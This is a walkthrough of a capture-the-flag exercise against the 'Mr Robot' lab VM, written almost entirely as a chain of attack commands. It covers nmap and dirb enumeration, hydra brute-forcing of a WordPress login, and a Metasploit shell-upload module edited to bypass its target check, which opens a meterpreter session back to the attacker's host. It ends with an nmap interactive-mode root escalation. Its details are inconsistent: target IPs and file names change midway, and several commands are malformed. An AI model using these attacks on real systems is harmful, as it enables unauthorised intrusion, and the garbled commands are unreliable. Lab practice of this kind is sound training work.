Mr Robot Walkthrough
Lab Environment
Attacker's Machine - Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux
Vulnerable Machine - Mr Robot
Proof Of Concept
arp-scan --local (to scan for the machines connected to the network)
vulnerable machine IP - 172.16.60.162
Scanning Phase
Now i will use nmap for further scanning the machine's IP
nmap -A 172.16.60.162 -Pn
Results : Port 80 is open and HTTP service is active . so i can browse the IP .
Found nothing interesting ,just interface of mr robot .
Since http service is active then i decided to find the directories and for that i fired up dirb .
Command : dirb http:172.16.60.162
Results : found many directories and also got directories of wordpress.
It was confirmed now that wordpress is used .
Important directories from dirb results : http://172.16.60.162/robots.txt
I started exploring the above listed two directories in browser one by one
Browsing http://172.16.60.162/robots.txt
I got two files one is dictionary file which is containing username and passwords and the other is our first flag .
Now i changed the url to http://172.16.60.162/key-1-of-3.txt to read the flag
After that changed the url to http://172.16.60.162 /fsocity.dic to open the file and i got a download dialogue box to save it so i saved it .
When i opened the .dic file i found that many names / numbers are repeated so i sorted the list uniquely to ignore the repeated names /numbers .
For that i opened up my terminal and changed my dir to Downloads as i have saved the .dic file in Downloads.
Command to sort the .dic file : sort -u fsocity.dic > /root/Desktop/unique.dic
Explanation of command :
Sort -u - it will arrange the content in order and this will form the list with unique content .
Fsocity.dic - is the file which is to be sorted uniquely .
/root/Desktop/unique.dic - is the location on which output will be saved and the name of the new file in which the output will be saved.
Now it’s time to explore our second dir given by dirb i.e http://172.1.60.162/wp-login
And found the login panel of wordpress which was pretty obvious.
Now i tried to brute force the admin panel .
We have one dictionary to brute force the panel .
I passed random password as wedontcare and brute force the username .
How i found the correct username ?
The quality of wordpress is that if we will provide correct username and wrong password it will give the error i.e password for the username is incorrect ,it means our username is correct .
So in the same way i passed the random password and used hydra to find the correct username first.
Command : hydra -vV -L /root/Desktop/unique.dic -p wedontcare 192.168.2.4 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
Let’s break it down:
-vV : Verbose
-L fsocity.dic.uniq : Try all the usernames from the file fsocity.dic.uniq
-p wedontcare : Use an unique password, it doesn’t matter (we’re only interested in the username for now)
192.168.2.4 : The IP of the machine we’re attacking
http-post-form : What we’re trying to brute force, here a HTTP POST form
‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
/wp-login.php : The path to where the form is located
log=^USER^&pwd=^PASS^&wp-submit=Log+In : The POST parameters to send. ^USER^ and ^PASS^ are placeholders that wiil be replaced with the actual values.
F=Invalid username : Consider an attempt as a failure (F) if the response contains the text Invalid username
After a few minutes, we get:
[80][http-post-form] host: 192.168.2.4 login: elliot password: wedontcare
Now we know there is a WordPress user named elliot. Let’s try to bruteforce his password using the same technique and wordlist
Command : hydra -vV -l elliot -P /root/Desktop/unique.dic vm http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
Elliot’s password appears to be ER28-0652. We can indeed login to the WordPress administration interface using these credentials.
Now i fired up msfconsole to search for wordpress exploit and got one
Exploit : exploit/unix/webapp/wp_admin_shell_upload
(but this exploit showed error that the target is not using wordpress so for that i edited the same exploit and commented out the error it was showing and we know that the comment part is not executed so now error will not occur )
To comment i used # before the error.
Path to edit exploit: /usr/share/metasploit-framework/modules/exploits/unix/webapp/admin_shell_upload
Now i renamed the exploit as admin_shell_upload1 and used it in msfconsole
Command : use exploit/unix/webapp/wp_admin_shell_upload1
Then i explored the requirements of exploit to execute
Now fullfilled the requirements and made exploit ready to use
Command : set USERNAME elliot
set PASSWORD ER28-0652
set LHOST 172.16.60.164
set TARGETURI http://172.16.60.162/wp-admin
set RHOST 172.16.60.162
Now simply type run or exploit to execute the exploit and we got the meterpreter session
Now i entered shell to escalate privileges
Command to escalate privileges : python -c ‘import pty; pty.spawn(“/bin/bash/”)’
On exploring the directories i found second flag and a password file in home >robot
And cracked the md5 password file with hashcat and found the password
Result of password - abcdefghijklmnopqrstuvwxyz
But still i was not able to read the second flag so i guessed something i.e i found the password in robot so it can be the username and password is already with me
So i switched user, using robot as a username .
Command : su robot
And pass is abcdefghijklmnopqrstuvwxyz
After switching the user to robot i was able to read the second flag
I used nmap for getting the root .
nmap can theoretically execute commands as root if we manage to have it run them for us
Command : nmap --interactive
And it worked after that i got root with the help of bash command
Command: !sh
Then i got root access and i finally found my last flag in root folder
